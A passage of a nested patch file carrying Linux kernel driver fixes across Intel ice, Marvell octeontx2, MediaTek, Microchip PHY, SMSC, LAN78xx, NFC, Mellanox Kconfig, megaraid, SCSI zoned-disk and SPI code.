++			agg = kcalloc(MAX_SKB_FRAGS, sizeof(*agg), GFP_KERNEL);
++			if (!agg)
++				return -ENOMEM;
++			rxr->rx_tpa[j].agg_arr = agg;
++		}
+ 		rxr->rx_tpa_idx_map = kzalloc(sizeof(*rxr->rx_tpa_idx_map),
+ 					      GFP_KERNEL);
+ 		if (!rxr->rx_tpa_idx_map)
+diff --git a/drivers/net/ethernet/intel/ice/ice_dcb.c b/drivers/net/ethernet/intel/ice/ice_dcb.c
+index 0b146a0d42058..6375372f87294 100644
+--- a/drivers/net/ethernet/intel/ice/ice_dcb.c
++++ b/drivers/net/ethernet/intel/ice/ice_dcb.c
+@@ -1372,7 +1372,7 @@ ice_add_dscp_pfc_tlv(struct ice_lldp_org_tlv *tlv, struct ice_dcbx_cfg *dcbcfg)
+ 	tlv->ouisubtype = htonl(ouisubtype);
+ 
+ 	buf[0] = dcbcfg->pfc.pfccap & 0xF;
+-	buf[1] = dcbcfg->pfc.pfcena & 0xF;
++	buf[1] = dcbcfg->pfc.pfcena;
+ }
+ 
+ /**
+diff --git a/drivers/net/ethernet/intel/ice/ice_ethtool.c b/drivers/net/ethernet/intel/ice/ice_ethtool.c
+index e1f6373a3a2c0..02eb78df2378e 100644
+--- a/drivers/net/ethernet/intel/ice/ice_ethtool.c
++++ b/drivers/net/ethernet/intel/ice/ice_ethtool.c
+@@ -4145,6 +4145,8 @@ ice_get_module_eeprom(struct net_device *netdev,
+ 		 * SFP modules only ever use page 0.
+ 		 */
+ 		if (page == 0 || !(data[0x2] & 0x4)) {
++			u32 copy_len;
++
+ 			/* If i2c bus is busy due to slow page change or
+ 			 * link management access, call can fail. This is normal.
+ 			 * So we retry this a few times.
+@@ -4168,8 +4170,8 @@ ice_get_module_eeprom(struct net_device *netdev,
+ 			}
+ 
+ 			/* Make sure we have enough room for the new block */
+-			if ((i + SFF_READ_BLOCK_SIZE) < ee->len)
+-				memcpy(data + i, value, SFF_READ_BLOCK_SIZE);
++			copy_len = min_t(u32, SFF_READ_BLOCK_SIZE, ee->len - i);
++			memcpy(data + i, value, copy_len);
+ 		}
+ 	}
+ 	return 0;
+diff --git a/drivers/net/ethernet/intel/ice/ice_tc_lib.c b/drivers/net/ethernet/intel/ice/ice_tc_lib.c
+index f68c555be4e9a..71cb15fcf63b9 100644
+--- a/drivers/net/ethernet/intel/ice/ice_tc_lib.c
++++ b/drivers/net/ethernet/intel/ice/ice_tc_lib.c
+@@ -1322,8 +1322,8 @@ ice_parse_cls_flower(struct net_device *filter_dev, struct ice_vsi *vsi,
+ 		if (match.mask->vlan_priority) {
+ 			fltr->flags |= ICE_TC_FLWR_FIELD_VLAN_PRIO;
+ 			headers->vlan_hdr.vlan_prio =
+-				cpu_to_be16((match.key->vlan_priority <<
+-					     VLAN_PRIO_SHIFT) & VLAN_PRIO_MASK);
++				be16_encode_bits(match.key->vlan_priority,
++						 VLAN_PRIO_MASK);
+ 		}
+ 
+ 		if (match.mask->vlan_tpid)
+@@ -1356,8 +1356,8 @@ ice_parse_cls_flower(struct net_device *filter_dev, struct ice_vsi *vsi,
+ 		if (match.mask->vlan_priority) {
+ 			fltr->flags |= ICE_TC_FLWR_FIELD_CVLAN_PRIO;
+ 			headers->cvlan_hdr.vlan_prio =
+-				cpu_to_be16((match.key->vlan_priority <<
+-					     VLAN_PRIO_SHIFT) & VLAN_PRIO_MASK);
++				be16_encode_bits(match.key->vlan_priority,
++						 VLAN_PRIO_MASK);
+ 		}
+ 	}
+ 
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu.h b/drivers/net/ethernet/marvell/octeontx2/af/rvu.h
+index 76474385a6027..b07c6f51b461b 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu.h
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu.h
+@@ -859,6 +859,9 @@ int rvu_cpt_lf_teardown(struct rvu *rvu, u16 pcifunc, int blkaddr, int lf,
+ 			int slot);
+ int rvu_cpt_ctx_flush(struct rvu *rvu, u16 pcifunc);
+ 
++#define NDC_AF_BANK_MASK       GENMASK_ULL(7, 0)
++#define NDC_AF_BANK_LINE_MASK  GENMASK_ULL(31, 16)
++
+ /* CN10K RVU */
+ int rvu_set_channels_base(struct rvu *rvu);
+ void rvu_program_channels(struct rvu *rvu);
+@@ -874,6 +877,8 @@ static inline void rvu_dbg_init(struct rvu *rvu) {}
+ static inline void rvu_dbg_exit(struct rvu *rvu) {}
+ #endif
+ 
++int rvu_ndc_fix_locked_cacheline(struct rvu *rvu, int blkaddr);
++
+ /* RVU Switch */
+ void rvu_switch_enable(struct rvu *rvu);
+ void rvu_switch_disable(struct rvu *rvu);
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu_debugfs.c b/drivers/net/ethernet/marvell/octeontx2/af/rvu_debugfs.c
+index f66dde2b0f926..abef0fd4259a3 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu_debugfs.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu_debugfs.c
+@@ -198,9 +198,6 @@ enum cpt_eng_type {
+ 	CPT_IE_TYPE = 3,
+ };
+ 
+-#define NDC_MAX_BANK(rvu, blk_addr) (rvu_read64(rvu, \
+-						blk_addr, NDC_AF_CONST) & 0xFF)
+-
+ #define rvu_dbg_NULL NULL
+ #define rvu_dbg_open_NULL NULL
+ 
+@@ -1448,6 +1445,7 @@ static int ndc_blk_hits_miss_stats(struct seq_file *s, int idx, int blk_addr)
+ 	struct nix_hw *nix_hw;
+ 	struct rvu *rvu;
+ 	int bank, max_bank;
++	u64 ndc_af_const;
+ 
+ 	if (blk_addr == BLKADDR_NDC_NPA0) {
+ 		rvu = s->private;
+@@ -1456,7 +1454,8 @@ static int ndc_blk_hits_miss_stats(struct seq_file *s, int idx, int blk_addr)
+ 		rvu = nix_hw->rvu;
+ 	}
+ 
+-	max_bank = NDC_MAX_BANK(rvu, blk_addr);
++	ndc_af_const = rvu_read64(rvu, blk_addr, NDC_AF_CONST);
++	max_bank = FIELD_GET(NDC_AF_BANK_MASK, ndc_af_const);
+ 	for (bank = 0; bank < max_bank; bank++) {
+ 		seq_printf(s, "BANK:%d\n", bank);
+ 		seq_printf(s, "\tHits:\t%lld\n",
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu_nix.c b/drivers/net/ethernet/marvell/octeontx2/af/rvu_nix.c
+index a62c1b3220120..84f2ba53b8b68 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu_nix.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu_nix.c
+@@ -790,6 +790,7 @@ static int nix_aq_enqueue_wait(struct rvu *rvu, struct rvu_block *block,
+ 	struct nix_aq_res_s *result;
+ 	int timeout = 1000;
+ 	u64 reg, head;
++	int ret;
+ 
+ 	result = (struct nix_aq_res_s *)aq->res->base;
+ 
+@@ -813,9 +814,22 @@ static int nix_aq_enqueue_wait(struct rvu *rvu, struct rvu_block *block,
+ 			return -EBUSY;
+ 	}
+ 
+-	if (result->compcode != NIX_AQ_COMP_GOOD)
++	if (result->compcode != NIX_AQ_COMP_GOOD) {
+ 		/* TODO: Replace this with some error code */
++		if (result->compcode == NIX_AQ_COMP_CTX_FAULT ||
++		    result->compcode == NIX_AQ_COMP_LOCKERR ||
++		    result->compcode == NIX_AQ_COMP_CTX_POISON) {
++			ret = rvu_ndc_fix_locked_cacheline(rvu, BLKADDR_NDC_NIX0_RX);
++			ret |= rvu_ndc_fix_locked_cacheline(rvu, BLKADDR_NDC_NIX0_TX);
++			ret |= rvu_ndc_fix_locked_cacheline(rvu, BLKADDR_NDC_NIX1_RX);
++			ret |= rvu_ndc_fix_locked_cacheline(rvu, BLKADDR_NDC_NIX1_TX);
++			if (ret)
++				dev_err(rvu->dev,
++					"%s: Not able to unlock cachelines\n", __func__);
++		}
++
+ 		return -EBUSY;
++	}
+ 
+ 	return 0;
+ }
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu_npa.c b/drivers/net/ethernet/marvell/octeontx2/af/rvu_npa.c
+index 70bd036ed76e4..4f5ca5ab13a40 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu_npa.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu_npa.c
+@@ -4,7 +4,7 @@
+  * Copyright (C) 2018 Marvell.
+  *
+  */
+-
++#include <linux/bitfield.h>
+ #include <linux/module.h>
+ #include <linux/pci.h>
+ 
+@@ -42,9 +42,18 @@ static int npa_aq_enqueue_wait(struct rvu *rvu, struct rvu_block *block,
+ 			return -EBUSY;
+ 	}
+ 
+-	if (result->compcode != NPA_AQ_COMP_GOOD)
++	if (result->compcode != NPA_AQ_COMP_GOOD) {
+ 		/* TODO: Replace this with some error code */
++		if (result->compcode == NPA_AQ_COMP_CTX_FAULT ||
++		    result->compcode == NPA_AQ_COMP_LOCKERR ||
++		    result->compcode == NPA_AQ_COMP_CTX_POISON) {
++			if (rvu_ndc_fix_locked_cacheline(rvu, BLKADDR_NDC_NPA0))
++				dev_err(rvu->dev,
++					"%s: Not able to unlock cachelines\n", __func__);
++		}
++
+ 		return -EBUSY;
++	}
+ 
+ 	return 0;
+ }
+@@ -545,3 +554,48 @@ void rvu_npa_lf_teardown(struct rvu *rvu, u16 pcifunc, int npalf)
+ 
+ 	npa_ctx_free(rvu, pfvf);
+ }
++
++/* Due to an Hardware errata, in some corner cases, AQ context lock
++ * operations can result in a NDC way getting into an illegal state
++ * of not valid but locked.
++ *
++ * This API solves the problem by clearing the lock bit of the NDC block.
++ * The operation needs to be done for each line of all the NDC banks.
++ */
++int rvu_ndc_fix_locked_cacheline(struct rvu *rvu, int blkaddr)
++{
++	int bank, max_bank, line, max_line, err;
++	u64 reg, ndc_af_const;
++
++	/* Set the ENABLE bit(63) to '0' */
++	reg = rvu_read64(rvu, blkaddr, NDC_AF_CAMS_RD_INTERVAL);
++	rvu_write64(rvu, blkaddr, NDC_AF_CAMS_RD_INTERVAL, reg & GENMASK_ULL(62, 0));
++
++	/* Poll until the BUSY bits(47:32) are set to '0' */
++	err = rvu_poll_reg(rvu, blkaddr, NDC_AF_CAMS_RD_INTERVAL, GENMASK_ULL(47, 32), true);
++	if (err) {
++		dev_err(rvu->dev, "Timed out while polling for NDC CAM busy bits.\n");
++		return err;
++	}
++
++	ndc_af_const = rvu_read64(rvu, blkaddr, NDC_AF_CONST);
++	max_bank = FIELD_GET(NDC_AF_BANK_MASK, ndc_af_const);
++	max_line = FIELD_GET(NDC_AF_BANK_LINE_MASK, ndc_af_const);
++	for (bank = 0; bank < max_bank; bank++) {
++		for (line = 0; line < max_line; line++) {
++			/* Check if 'cache line valid bit(63)' is not set
++			 * but 'cache line lock bit(60)' is set and on
++			 * success, reset the lock bit(60).
++			 */
++			reg = rvu_read64(rvu, blkaddr,
++					 NDC_AF_BANKX_LINEX_METADATA(bank, line));
++			if (!(reg & BIT_ULL(63)) && (reg & BIT_ULL(60))) {
++				rvu_write64(rvu, blkaddr,
++					    NDC_AF_BANKX_LINEX_METADATA(bank, line),
++					    reg & ~BIT_ULL(60));
++			}
++		}
++	}
++
++	return 0;
++}
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu_reg.h b/drivers/net/ethernet/marvell/octeontx2/af/rvu_reg.h
+index 0e0d536645ac7..39f7a7cb27558 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu_reg.h
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu_reg.h
+@@ -690,6 +690,7 @@
+ #define NDC_AF_INTR_ENA_W1S		(0x00068)
+ #define NDC_AF_INTR_ENA_W1C		(0x00070)
+ #define NDC_AF_ACTIVE_PC		(0x00078)
++#define NDC_AF_CAMS_RD_INTERVAL		(0x00080)
+ #define NDC_AF_BP_TEST_ENABLE		(0x001F8)
+ #define NDC_AF_BP_TEST(a)		(0x00200 | (a) << 3)
+ #define NDC_AF_BLK_RST			(0x002F0)
+@@ -705,6 +706,8 @@
+ 		(0x00F00 | (a) << 5 | (b) << 4)
+ #define NDC_AF_BANKX_HIT_PC(a)		(0x01000 | (a) << 3)
+ #define NDC_AF_BANKX_MISS_PC(a)		(0x01100 | (a) << 3)
++#define NDC_AF_BANKX_LINEX_METADATA(a, b) \
++		(0x10000 | (a) << 12 | (b) << 3)
+ 
+ /* LBK */
+ #define LBK_CONST			(0x10ull)
+diff --git a/drivers/net/ethernet/mediatek/mtk_eth_soc.c b/drivers/net/ethernet/mediatek/mtk_eth_soc.c
+index 53ee9dea66388..49975924e2426 100644
+--- a/drivers/net/ethernet/mediatek/mtk_eth_soc.c
++++ b/drivers/net/ethernet/mediatek/mtk_eth_soc.c
+@@ -561,7 +561,8 @@ static int mtk_mac_finish(struct phylink_config *config, unsigned int mode,
+ 	mcr_cur = mtk_r32(mac->hw, MTK_MAC_MCR(mac->id));
+ 	mcr_new = mcr_cur;
+ 	mcr_new |= MAC_MCR_IPG_CFG | MAC_MCR_FORCE_MODE |
+-		   MAC_MCR_BACKOFF_EN | MAC_MCR_BACKPR_EN | MAC_MCR_FORCE_LINK;
++		   MAC_MCR_BACKOFF_EN | MAC_MCR_BACKPR_EN | MAC_MCR_FORCE_LINK |
++		   MAC_MCR_RX_FIFO_CLR_DIS;
+ 
+ 	/* Only update control register when needed! */
+ 	if (mcr_new != mcr_cur)
+diff --git a/drivers/net/ethernet/mediatek/mtk_eth_soc.h b/drivers/net/ethernet/mediatek/mtk_eth_soc.h
+index 306fdc2c608a4..dafa9a0baa58c 100644
+--- a/drivers/net/ethernet/mediatek/mtk_eth_soc.h
++++ b/drivers/net/ethernet/mediatek/mtk_eth_soc.h
+@@ -357,6 +357,7 @@
+ #define MAC_MCR_FORCE_MODE	BIT(15)
+ #define MAC_MCR_TX_EN		BIT(14)
+ #define MAC_MCR_RX_EN		BIT(13)
++#define MAC_MCR_RX_FIFO_CLR_DIS	BIT(12)
+ #define MAC_MCR_BACKOFF_EN	BIT(9)
+ #define MAC_MCR_BACKPR_EN	BIT(8)
+ #define MAC_MCR_FORCE_RX_FC	BIT(5)
+diff --git a/drivers/net/ethernet/microchip/lan966x/lan966x_police.c b/drivers/net/ethernet/microchip/lan966x/lan966x_police.c
+index a9aec900d608d..7d66fe75cd3bf 100644
+--- a/drivers/net/ethernet/microchip/lan966x/lan966x_police.c
++++ b/drivers/net/ethernet/microchip/lan966x/lan966x_police.c
+@@ -194,7 +194,7 @@ int lan966x_police_port_del(struct lan966x_port *port,
+ 		return -EINVAL;
+ 	}
+ 
+-	err = lan966x_police_del(port, port->tc.police_id);
++	err = lan966x_police_del(port, POL_IDX_PORT + port->chip_port);
+ 	if (err) {
+ 		NL_SET_ERR_MSG_MOD(extack,
+ 				   "Failed to add policer to port");
+diff --git a/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c b/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
+index 84e1740b12f1b..3c1d4b27668fe 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
++++ b/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
+@@ -1168,6 +1168,7 @@ static int stmmac_init_phy(struct net_device *dev)
+ 
+ 		phylink_ethtool_get_wol(priv->phylink, &wol);
+ 		device_set_wakeup_capable(priv->device, !!wol.supported);
++		device_set_wakeup_enable(priv->device, !!wol.wolopts);
+ 	}
+ 
+ 	return ret;
+diff --git a/drivers/net/phy/microchip.c b/drivers/net/phy/microchip.c
+index ccecee2524ce6..0b88635f4fbca 100644
+--- a/drivers/net/phy/microchip.c
++++ b/drivers/net/phy/microchip.c
+@@ -342,6 +342,37 @@ static int lan88xx_config_aneg(struct phy_device *phydev)
+ 	return genphy_config_aneg(phydev);
+ }
+ 
++static void lan88xx_link_change_notify(struct phy_device *phydev)
++{
++	int temp;
++
++	/* At forced 100 F/H mode, chip may fail to set mode correctly
++	 * when cable is switched between long(~50+m) and short one.
++	 * As workaround, set to 10 before setting to 100
++	 * at forced 100 F/H mode.
++	 */
++	if (!phydev->autoneg && phydev->speed == 100) {
++		/* disable phy interrupt */
++		temp = phy_read(phydev, LAN88XX_INT_MASK);
++		temp &= ~LAN88XX_INT_MASK_MDINTPIN_EN_;
++		phy_write(phydev, LAN88XX_INT_MASK, temp);
++
++		temp = phy_read(phydev, MII_BMCR);
++		temp &= ~(BMCR_SPEED100 | BMCR_SPEED1000);
++		phy_write(phydev, MII_BMCR, temp); /* set to 10 first */
++		temp |= BMCR_SPEED100;
++		phy_write(phydev, MII_BMCR, temp); /* set to 100 later */
++
++		/* clear pending interrupt generated while workaround */
++		temp = phy_read(phydev, LAN88XX_INT_STS);
++
++		/* enable phy interrupt back */
++		temp = phy_read(phydev, LAN88XX_INT_MASK);
++		temp |= LAN88XX_INT_MASK_MDINTPIN_EN_;
++		phy_write(phydev, LAN88XX_INT_MASK, temp);
++	}
++}
++
+ static struct phy_driver microchip_phy_driver[] = {
+ {
+ 	.phy_id		= 0x0007c132,
+@@ -359,6 +390,7 @@ static struct phy_driver microchip_phy_driver[] = {
+ 
+ 	.config_init	= lan88xx_config_init,
+ 	.config_aneg	= lan88xx_config_aneg,
++	.link_change_notify = lan88xx_link_change_notify,
+ 
+ 	.config_intr	= lan88xx_phy_config_intr,
+ 	.handle_interrupt = lan88xx_handle_interrupt,
+diff --git a/drivers/net/phy/phy_device.c b/drivers/net/phy/phy_device.c
+index 8cff61dbc4b57..7fbb0904b3c0f 100644
+--- a/drivers/net/phy/phy_device.c
++++ b/drivers/net/phy/phy_device.c
+@@ -3041,8 +3041,6 @@ static int phy_probe(struct device *dev)
+ 	if (phydrv->flags & PHY_IS_INTERNAL)
+ 		phydev->is_internal = true;
+ 
+-	mutex_lock(&phydev->lock);
+-
+ 	/* Deassert the reset signal */
+ 	phy_device_reset(phydev, 0);
+ 
+@@ -3110,12 +3108,10 @@ static int phy_probe(struct device *dev)
+ 	phydev->state = PHY_READY;
+ 
+ out:
+-	/* Assert the reset signal */
++	/* Re-assert the reset signal on error */
+ 	if (err)
+ 		phy_device_reset(phydev, 1);
+ 
+-	mutex_unlock(&phydev->lock);
+-
+ 	return err;
+ }
+ 
+@@ -3125,9 +3121,7 @@ static int phy_remove(struct device *dev)
+ 
+ 	cancel_delayed_work_sync(&phydev->state_queue);
+ 
+-	mutex_lock(&phydev->lock);
+ 	phydev->state = PHY_DOWN;
+-	mutex_unlock(&phydev->lock);
+ 
+ 	sfp_bus_del_upstream(phydev->sfp_bus);
+ 	phydev->sfp_bus = NULL;
+diff --git a/drivers/net/phy/smsc.c b/drivers/net/phy/smsc.c
+index ac7481ce2fc16..00d9eff91dcfa 100644
+--- a/drivers/net/phy/smsc.c
++++ b/drivers/net/phy/smsc.c
+@@ -44,7 +44,6 @@ static struct smsc_hw_stat smsc_hw_stats[] = {
+ };
+ 
+ struct smsc_phy_priv {
+-	u16 intmask;
+ 	bool energy_enable;
+ };
+ 
+@@ -57,7 +56,6 @@ static int smsc_phy_ack_interrupt(struct phy_device *phydev)
+ 
+ static int smsc_phy_config_intr(struct phy_device *phydev)
+ {
+-	struct smsc_phy_priv *priv = phydev->priv;
+ 	int rc;
+ 
+ 	if (phydev->interrupts == PHY_INTERRUPT_ENABLED) {
+@@ -65,14 +63,9 @@ static int smsc_phy_config_intr(struct phy_device *phydev)
+ 		if (rc)
+ 			return rc;
+ 
+-		priv->intmask = MII_LAN83C185_ISF_INT4 | MII_LAN83C185_ISF_INT6;
+-		if (priv->energy_enable)
+-			priv->intmask |= MII_LAN83C185_ISF_INT7;
+-
+-		rc = phy_write(phydev, MII_LAN83C185_IM, priv->intmask);
++		rc = phy_write(phydev, MII_LAN83C185_IM,
++			       MII_LAN83C185_ISF_INT_PHYLIB_EVENTS);
+ 	} else {
+-		priv->intmask = 0;
+-
+ 		rc = phy_write(phydev, MII_LAN83C185_IM, 0);
+ 		if (rc)
+ 			return rc;
+@@ -85,7 +78,6 @@ static int smsc_phy_config_intr(struct phy_device *phydev)
+ 
+ static irqreturn_t smsc_phy_handle_interrupt(struct phy_device *phydev)
+ {
+-	struct smsc_phy_priv *priv = phydev->priv;
+ 	int irq_status;
+ 
+ 	irq_status = phy_read(phydev, MII_LAN83C185_ISF);
+@@ -96,7 +88,7 @@ static irqreturn_t smsc_phy_handle_interrupt(struct phy_device *phydev)
+ 		return IRQ_NONE;
+ 	}
+ 
+-	if (!(irq_status & priv->intmask))
++	if (!(irq_status & MII_LAN83C185_ISF_INT_PHYLIB_EVENTS))
+ 		return IRQ_NONE;
+ 
+ 	phy_trigger_machine(phydev);
+diff --git a/drivers/net/usb/lan78xx.c b/drivers/net/usb/lan78xx.c
+index f18ab8e220db7..068488890d57b 100644
+--- a/drivers/net/usb/lan78xx.c
++++ b/drivers/net/usb/lan78xx.c
+@@ -2115,33 +2115,8 @@ static void lan78xx_remove_mdio(struct lan78xx_net *dev)
+ static void lan78xx_link_status_change(struct net_device *net)
+ {
+ 	struct phy_device *phydev = net->phydev;
+-	int temp;
+-
+-	/* At forced 100 F/H mode, chip may fail to set mode correctly
+-	 * when cable is switched between long(~50+m) and short one.
+-	 * As workaround, set to 10 before setting to 100
+-	 * at forced 100 F/H mode.
+-	 */
+-	if (!phydev->autoneg && (phydev->speed == 100)) {
+-		/* disable phy interrupt */
+-		temp = phy_read(phydev, LAN88XX_INT_MASK);
+-		temp &= ~LAN88XX_INT_MASK_MDINTPIN_EN_;
+-		phy_write(phydev, LAN88XX_INT_MASK, temp);
+ 
+-		temp = phy_read(phydev, MII_BMCR);
+-		temp &= ~(BMCR_SPEED100 | BMCR_SPEED1000);
+-		phy_write(phydev, MII_BMCR, temp); /* set to 10 first */
+-		temp |= BMCR_SPEED100;
+-		phy_write(phydev, MII_BMCR, temp); /* set to 100 later */
+-
+-		/* clear pending interrupt generated while workaround */
+-		temp = phy_read(phydev, LAN88XX_INT_STS);
+-
+-		/* enable phy interrupt back */
+-		temp = phy_read(phydev, LAN88XX_INT_MASK);
+-		temp |= LAN88XX_INT_MASK_MDINTPIN_EN_;
+-		phy_write(phydev, LAN88XX_INT_MASK, temp);
+-	}
++	phy_print_status(phydev);
+ }
+ 
+ static int irq_map(struct irq_domain *d, unsigned int irq,
+diff --git a/drivers/nfc/fdp/i2c.c b/drivers/nfc/fdp/i2c.c
+index 2d53e0f88d2f9..1e0f2297f9c66 100644
+--- a/drivers/nfc/fdp/i2c.c
++++ b/drivers/nfc/fdp/i2c.c
+@@ -247,6 +247,9 @@ static void fdp_nci_i2c_read_device_properties(struct device *dev,
+ 					   len, sizeof(**fw_vsc_cfg),
+ 					   GFP_KERNEL);
+ 
++		if (!*fw_vsc_cfg)
++			goto alloc_err;
++
+ 		r = device_property_read_u8_array(dev, FDP_DP_FW_VSC_CFG_NAME,
+ 						  *fw_vsc_cfg, len);
+ 
+@@ -260,6 +263,7 @@ vsc_read_err:
+ 		*fw_vsc_cfg = NULL;
+ 	}
+ 
++alloc_err:
+ 	dev_dbg(dev, "Clock type: %d, clock frequency: %d, VSC: %s",
+ 		*clock_type, *clock_freq, *fw_vsc_cfg != NULL ? "yes" : "no");
+ }
+diff --git a/drivers/platform/mellanox/Kconfig b/drivers/platform/mellanox/Kconfig
+index 09c7829e95c4b..382793e73a60a 100644
+--- a/drivers/platform/mellanox/Kconfig
++++ b/drivers/platform/mellanox/Kconfig
+@@ -16,17 +16,17 @@ if MELLANOX_PLATFORM
+ 
+ config MLXREG_HOTPLUG
+ 	tristate "Mellanox platform hotplug driver support"
+-	depends on REGMAP
+ 	depends on HWMON
+ 	depends on I2C
++	select REGMAP
+ 	help
+ 	  This driver handles hot-plug events for the power suppliers, power
+ 	  cables and fans on the wide range Mellanox IB and Ethernet systems.
+ 
+ config MLXREG_IO
+ 	tristate "Mellanox platform register access driver support"
+-	depends on REGMAP
+ 	depends on HWMON
++	select REGMAP
+ 	help
+ 	  This driver allows access to Mellanox programmable device register
+ 	  space through sysfs interface. The sets of registers for sysfs access
+@@ -36,9 +36,9 @@ config MLXREG_IO
+ 
+ config MLXREG_LC
+ 	tristate "Mellanox line card platform driver support"
+-	depends on REGMAP
+ 	depends on HWMON
+ 	depends on I2C
++	select REGMAP
+ 	help
+ 	  This driver provides support for the Mellanox MSN4800-XX line cards,
+ 	  which are the part of MSN4800 Ethernet modular switch systems
+@@ -80,10 +80,9 @@ config MLXBF_PMC
+ 
+ config NVSW_SN2201
+ 	tristate "Nvidia SN2201 platform driver support"
+-	depends on REGMAP
+ 	depends on HWMON
+ 	depends on I2C
+-	depends on REGMAP_I2C
++	select REGMAP_I2C
+ 	help
+ 	  This driver provides support for the Nvidia SN2201 platform.
+ 	  The SN2201 is a highly integrated for one rack unit system with
+diff --git a/drivers/platform/x86/Kconfig b/drivers/platform/x86/Kconfig
+index f5312f51de19f..b02a8125bc7d5 100644
+--- a/drivers/platform/x86/Kconfig
++++ b/drivers/platform/x86/Kconfig
+@@ -997,7 +997,8 @@ config SERIAL_MULTI_INSTANTIATE
+ 
+ config MLX_PLATFORM
+ 	tristate "Mellanox Technologies platform support"
+-	depends on I2C && REGMAP
++	depends on I2C
++	select REGMAP
+ 	help
+ 	  This option enables system support for the Mellanox Technologies
+ 	  platform. The Mellanox systems provide data center networking
+diff --git a/drivers/scsi/hosts.c b/drivers/scsi/hosts.c
+index 9857dba09c951..85e66574ec414 100644
+--- a/drivers/scsi/hosts.c
++++ b/drivers/scsi/hosts.c
+@@ -181,6 +181,7 @@ void scsi_remove_host(struct Scsi_Host *shost)
+ 	scsi_forget_host(shost);
+ 	mutex_unlock(&shost->scan_mutex);
+ 	scsi_proc_host_rm(shost);
++	scsi_proc_hostdir_rm(shost->hostt);
+ 
+ 	/*
+ 	 * New SCSI devices cannot be attached anymore because of the SCSI host
+@@ -340,6 +341,7 @@ static void scsi_host_dev_release(struct device *dev)
+ 	struct Scsi_Host *shost = dev_to_shost(dev);
+ 	struct device *parent = dev->parent;
+ 
++	/* In case scsi_remove_host() has not been called. */
+ 	scsi_proc_hostdir_rm(shost->hostt);
+ 
+ 	/* Wait for functions invoked through call_rcu(&scmd->rcu, ...) */
+diff --git a/drivers/scsi/megaraid/megaraid_sas.h b/drivers/scsi/megaraid/megaraid_sas.h
+index 4919ea54b8277..2ef9d41fc6f42 100644
+--- a/drivers/scsi/megaraid/megaraid_sas.h
++++ b/drivers/scsi/megaraid/megaraid_sas.h
+@@ -1519,6 +1519,8 @@ struct megasas_ctrl_info {
+ #define MEGASAS_MAX_LD_IDS			(MEGASAS_MAX_LD_CHANNELS * \
+ 						MEGASAS_MAX_DEV_PER_CHANNEL)
+ 
++#define MEGASAS_MAX_SUPPORTED_LD_IDS		240
++
+ #define MEGASAS_MAX_SECTORS                    (2*1024)
+ #define MEGASAS_MAX_SECTORS_IEEE		(2*128)
+ #define MEGASAS_DBG_LVL				1
+diff --git a/drivers/scsi/megaraid/megaraid_sas_fp.c b/drivers/scsi/megaraid/megaraid_sas_fp.c
+index da1cad1ee1238..4463a538102ad 100644
+--- a/drivers/scsi/megaraid/megaraid_sas_fp.c
++++ b/drivers/scsi/megaraid/megaraid_sas_fp.c
+@@ -358,7 +358,7 @@ u8 MR_ValidateMapInfo(struct megasas_instance *instance, u64 map_id)
+ 		ld = MR_TargetIdToLdGet(i, drv_map);
+ 
+ 		/* For non existing VDs, iterate to next VD*/
+-		if (ld >= (MAX_LOGICAL_DRIVES_EXT - 1))
++		if (ld >= MEGASAS_MAX_SUPPORTED_LD_IDS)
+ 			continue;
+ 
+ 		raid = MR_LdRaidGet(ld, drv_map);
+diff --git a/drivers/scsi/sd.c b/drivers/scsi/sd.c
+index eb76ba0550216..e934779bf05c8 100644
+--- a/drivers/scsi/sd.c
++++ b/drivers/scsi/sd.c
+@@ -2933,8 +2933,13 @@ static void sd_read_block_characteristics(struct scsi_disk *sdkp)
+ 	}
+ 
+ 	if (sdkp->device->type == TYPE_ZBC) {
+-		/* Host-managed */
++		/*
++		 * Host-managed: Per ZBC and ZAC specifications, writes in
++		 * sequential write required zones of host-managed devices must
++		 * be aligned to the device physical block size.
++		 */
+ 		disk_set_zoned(sdkp->disk, BLK_ZONED_HM);
++		blk_queue_zone_write_granularity(q, sdkp->physical_block_size);
+ 	} else {
+ 		sdkp->zoned = zoned;
+ 		if (sdkp->zoned == 1) {
+diff --git a/drivers/scsi/sd_zbc.c b/drivers/scsi/sd_zbc.c
+index bd15624c63228..4c35b4a916355 100644
+--- a/drivers/scsi/sd_zbc.c
++++ b/drivers/scsi/sd_zbc.c
+@@ -956,14 +956,6 @@ int sd_zbc_read_zones(struct scsi_disk *sdkp, u8 buf[SD_BUF_SIZE])
+ 	disk_set_max_active_zones(disk, 0);
+ 	nr_zones = round_up(sdkp->capacity, zone_blocks) >> ilog2(zone_blocks);
+ 
+-	/*
+-	 * Per ZBC and ZAC specifications, writes in sequential write required
+-	 * zones of host-managed devices must be aligned to the device physical
+-	 * block size.
+-	 */
+-	if (blk_queue_zoned_model(q) == BLK_ZONED_HM)
+-		blk_queue_zone_write_granularity(q, sdkp->physical_block_size);
+-
+ 	sdkp->early_zone_info.nr_zones = nr_zones;
+ 	sdkp->early_zone_info.zone_blocks = zone_blocks;
+ 
+diff --git a/drivers/spi/spi-intel.c b/drivers/spi/spi-intel.c
+index 3ac73691fbb54..54fc226e1cdf6 100644
+--- a/drivers/spi/spi-intel.c
++++ b/drivers/spi/spi-intel.c
+@@ -1366,14 +1366,14 @@ static int intel_spi_populate_chip(struct intel_spi *ispi)
+ 	if (!spi_new_device(ispi->master, &chip))
+ 		return -ENODEV;
+ 
+-	/* Add the second chip if present */
+-	if (ispi->master->num_chipselect < 2)
+-		return 0;
+-
+ 	ret = intel_spi_read_desc(ispi);
